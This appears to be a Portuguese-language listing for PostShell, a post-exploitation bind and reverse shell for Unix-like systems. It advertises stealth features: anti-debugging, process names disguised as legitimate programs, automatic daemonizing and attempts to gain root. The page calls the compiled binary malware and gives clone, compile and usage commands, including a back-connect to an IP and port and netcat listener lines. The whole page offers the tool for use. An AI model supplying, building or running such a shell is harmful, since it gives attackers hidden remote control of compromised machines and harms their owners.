O PostShell é um shell pós-exploração que inclui um shell de ligação e um de conexão traseira. Ele cria um TTY totalmente interativo que permite o controle do trabalho. O tamanho do stub é de cerca de 14kb e pode ser compilado em qualquer sistema semelhante ao Unix . 

Por que não usar um Backconnect / Bind Shell tradicional?
O PostShell permite uma pós-exploração mais fácil, tornando o invasor menos dependente de dependências como Python e Perl. Ele também incorpora um shell de conexão traseira e ligação, o que significa que, se um destino não permitir conexões de saída, um operador pode simplesmente iniciar um shell de ligação e conectar-se à máquina remotamente. O PostShell também é significativamente menos suspeito do que um shell tradicional, devido ao fato de o nome dos processos e argumentos estarem ocultos.

Recursos

  • Anti-Debugging, se o ptrace for detectado como anexado ao shell, ele sairá.
  • Os nomes de processos / threads são encobertos, um nome falso substitui todos os argumentos do sistema e o nome do arquivo para parecer um programa legítimo.
  • TTY, é criado um TTY que essencialmente permite o mesmo uso da máquina como se você estivesse conectado via SSH.
  • Shell de ligação / conexão traseira, tanto um shell de ligação como uma conexão traseira podem ser criados.
  • Tamanho de esboço pequeno, geralmente é gerado um esboço muito pequeno (<14kb).
  • Daemonizes automaticamente
  • Tenta definir GUID / UID como 0 (raiz)

Começando

  1. Baixando: git clone https://github.com/rek7/postshell
  2. Compilando: cd postshell && sh compile.sh Isso deve criar um binário chamado “stub”, que é o malware.

Comandos

$ ./stub
Bind Shell Usage: ./stub port
Back Connect Usage: ./stub ip port
$

Exemplo de
Backconnect de uso :

$ ./stub 127.0.0.1 13377

Shell de ligação:

$ ./stub 13377

Recebendo uma conexão com o Netcat
Recebendo uma backconnect:

$ nc -vlp port

Conectando a um Shell de ligação:

$ nc host port

FAÇAM:

  • Adicionar resolução de domínio

Baixar Postshell